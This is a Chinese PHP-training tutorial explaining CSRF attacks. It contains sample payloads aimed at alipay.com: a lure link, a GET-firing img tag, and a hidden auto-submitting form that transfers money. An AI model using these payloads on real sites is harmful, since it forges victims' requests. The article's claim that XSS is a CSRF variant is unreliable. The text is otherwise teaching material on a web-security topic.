当前位置: 维易PHP培训学院 > 微信开发 > 内容正文

PHP开发之CSRF的攻击方式及原理

作者:扣丁学堂   时间 2017-08-09

《PHP开发之CSRF的攻击方式及原理》要点:
本文介绍了PHP开发之CSRF的攻击方式及原理,希望对您有用。如果有疑问,可以联系我们。

维易PHP培训学院每天发布《PHP开发之CSRF的攻击方式及原理》等实战技能,PHP、MYSQL、LINUX、APP、JS,CSS全面培养人才。

CSRF全称叫做,跨站哀求伪造.

便是黑客可以伪造用户的身份去做一些操作,进而满足自身目的.

PHP开发之CSRF的攻击方式及原理

这是哀求伪造的基本原理.那么支付宝验证用户身份的机制是什么呢?

PHP开发之CSRF的攻击方式及原理

伪造哀求的方式一般有如下几种方式:

页面中有一个超链接,诱导用户进行点击

<a href=”https://alipay.com?userid=3&money=9999”>iphone8提前曝光</a>

直接在页面上使用Img进行get哀求

<img src=”https://alipay.com?userid=3&money=9999”/>

或使用表单进行提交

<iframe name="heihei" style="display:none;"></iframe>

<formaction="https://alipay.com?userid=3&money=9999" method="post" target="heihei" >

<input name="userid" value="3" type="hidden" />

<input name="money" value="9999" type="hidden" />

</form>

<script>

window.onload = function(){

document.forms[0].submit();

}

</script>

除此之外,CSRF还有一个变种攻击,叫做XSS

使用了脚本注入的原理,来进行更彻底的身份伪造.

PHP开发之CSRF的攻击方式及原理

以上是关于CSRF的攻击方式及原理介绍,有兴趣的同学可以自行试验一番.

【文章转载于:扣丁学堂微信"大众号】

转载请注明本页网址:
http://www.vephp.com/jiaocheng/10579.html


    标签:  




同类教程排行


特辑教程